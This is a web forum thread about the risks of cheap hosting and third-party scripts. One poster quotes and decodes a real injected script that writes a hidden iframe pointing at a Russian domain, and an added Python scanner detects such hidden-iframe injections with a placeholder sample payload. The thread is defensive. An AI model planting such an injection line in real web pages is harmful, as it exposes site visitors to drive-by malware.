Hints for those new to having a site...

Greg K

He has: 2,145 posts

Joined: Nov 2003

#1 - You get what you pay for
#2 - For a business site, ask someone who knows what they are doing to at least look at the site for problems (not just "looks")

Here is why I bring these two up.

Where I work, they moved a few websites to a different hosting company which is only $1 a month and has pretty much "unlimited resources" (and has a not so strict SPAM policy :( ). Also they installed some 3rd party canned scripts to try out.

Well, I'm still not sure where the issue is; I'm leaving it to those who moved it. I only work on the site that is on our own dedicated server. But in looking at one of the sites moved to this account, which is basically a static page, only calling a few images from our site, the status bar was going nuts loading things from x-victory.ru, golum.info, a few other Russian domains, a few IP addresses.

I go to the source code, and find out that on ALL of the domains, they now have added code at the bottom of the page...

<script>eval(unescape("%77%69%6e%64%....

I take this and plug it into the urldecode function in PHP, and find it decodes to the following (I added line breaks for easier reading):

window.status='Done';
document.write('<iframe name=27d625dbcdf src=\'http://x-victory.ru/forum?'+Math.round(Math.random()*69500)+'88\' width=500 height=139 style=\'display: none\'></iframe>')

Some pages also have code right after the tag which does pretty much the same, a hidden IFRAME calling some other site.

I investigate, and find that the files themselves are modified, not like when GeoCities would auto inject code into the pages being called. In fact, the one file was modified last night at 7:05pm. The office is closed then.

Well I get told at this point that they installed some scripts on the server, and maybe that did it.

I do more checking. This host has it set that any PHP script runs as our username, so any PHP script can modify our own files. Where I have hosting, and where we have our dedicated server, unless specifically set up, PHP files run as user "nobody", and therefore cannot modify pages we upload (unless you change permissions on the file after it is uploaded).

So they go and "remove" the scripts. Well, after re-uploading the pages (on about 10 domains), an hour later already again they are remodified....

So I ask, did you delete everything and start over, or just the directory where you installed the script? 'Cause if it can write over our own files, guess what, it can create its own directories too....

So anyhow, either the cheap hosting, or the free scripts are modifying every one of our domains to have hidden iframes and calling other sites. Even if it was the scripts, well the hosting company letting scripts run as our own username is crazy.

So again, you get what you pay for. Go for the cheapest hosting and/or free scripts to do things, make sure you fully check them out, and not just from a "well I have used them for years" testimony from someone who would have no idea that this is happening in the first place.

(done ranting now... LOL)

-Greg
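
An added example, not part of the original post: a defender-side scanner for the pattern described above. It decodes each eval(unescape("...")) wrapper, lists the hosts of any hidden iframes, and reports the file's modification time so changes can be matched against out-of-hours writes. The sample page and the host injected.example are constructed placeholders.

```python
import re
from pathlib import Path
from urllib.parse import unquote, urlparse

# eval(unescape("%77%69...")) wrapper of the kind quoted in the post
WRAPPED = re.compile(r"""eval\(\s*unescape\(\s*(["'])([^"']+)\1\s*\)\s*\)""")
# iframe tag, either raw HTML or inside a document.write() string
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"""src\s*=\s*[\\"']*([^\s"'\\>]+)""", re.I)
HIDDEN = re.compile(
    r"""display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*=\s*[\\"']*0\b""",
    re.I)

def hidden_iframes(text):
    """Return the hosts of iframes that are styled to be invisible."""
    hosts = []
    for tag in IFRAME.findall(text):
        src = SRC.search(tag)
        if src and HIDDEN.search(tag):
            hosts.append(urlparse(src.group(1)).hostname)
    return hosts

def inspect(html):
    """Decode every eval(unescape(...)) blob, then list hidden-iframe hosts."""
    layers = [html] + [unquote(m.group(2)) for m in WRAPPED.finditer(html)]
    return sorted({h for layer in layers for h in hidden_iframes(layer) if h})

def scan(root, exts=(".html", ".htm", ".php", ".js")):
    """Walk a docroot; yield (path, mtime, hosts) for every file with findings."""
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in exts:
            hosts = inspect(p.read_text(errors="replace"))
            if hosts:
                yield str(p), p.stat().st_mtime, hosts

# Constructed sample: same shape as the injected line in the post, but
# pointing at a placeholder host.
_PAYLOAD = ("window.status='Done';document.write('<iframe name=x "
            "src=\\'http://injected.example/forum?'+Math.round(Math.random()*100)+"
            "'\\' width=500 height=139 style=\\'display: none\\'></iframe>')")
SAMPLE = ("<html><body><p>static page</p></body></html>\n"
          "<script>eval(unescape(\""
          + "".join("%%%02x" % b for b in _PAYLOAD.encode())
          + "\"))</script>")

if __name__ == "__main__":
    print(inspect(SAMPLE))
```

Because the injected code can also create its own files and directories, a clean result from this scan does not show that the account is clean; it only finds pages carrying this particular wrapper or a plainly hidden iframe.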

He has: 43 posts

Joined: May 2005

Personally I steer well clear of these cheapo £1 sites.
You get hit with restrictions, the site isn't even your own and the bandwidth is capped (slow surfing etc).
For newbies starting out it's cool but once you get up and running the big bad world of domain names and hosting companies beckons ;)

Lottoplus

They have: 2 posts

Joined: Nov 2007

To get good hosting doesn't have to cost the earth; if a person isn't willing to pay about €3.95 (to host 25 sites) a month for good hosting with a good control panel and all up-to-date software after investing in a website, it's really their own lookout.

demonhale

He has: 3,278 posts

Joined: May 2005

That's one of my dilemmas as a web designer as well as a developer: some clients insist on getting their own hosting, which is OK if they heed my suggestions, but most of the time they will skimp on the most essential part, which is security. They will get injection attacks, and the same insertions as Greg has, and they would then blame me for those, which I try to explain in vain. They think I'm sabotaging them, especially if the insertion code makes popups. What also ticks me off the most is when client computers have trojans and when a certain keyword on their page triggers a trojan warning, they immediately associate it with the site when it actually is because of their infected computers...

I hope they actually start reading this stuff to know what's important in getting a design and development service...

Greg K

He has: 2,145 posts

Joined: Nov 2003

In our company's case, it was determined that it was a 3rd party script that was installed onto one of the sites. They ended up completely deleting all files and re-uploading the web pages; so far no pages affected.

Now if it was me, I would have done some elimination to find out which one it was, but as I mentioned someone else had done it. According to him, he only installed scripts from the host's control panel, (how truthful that is, who knows).

I told him though, as long as they are with this cheap host, don't install any 3rd party scripts because they all run as our user name, allowing them to modify any files we have.

-Greg

They have: 16 posts

Joined: May 2007

Trouble is, someone setting up a site for the first (or second) time frequently doesn't know what they may need in the future.

As someone who never does things the easy way I speak from experience. I've just moved a site to a new server after twelve months because it developed in ways I hadn't imagined, and I now need to run programmes on my server that my old server wouldn't allow. You definitely get what you pay for.

Book of Remembrance

James

He has: 127 posts

Joined: Dec 2005

Some fine points :)
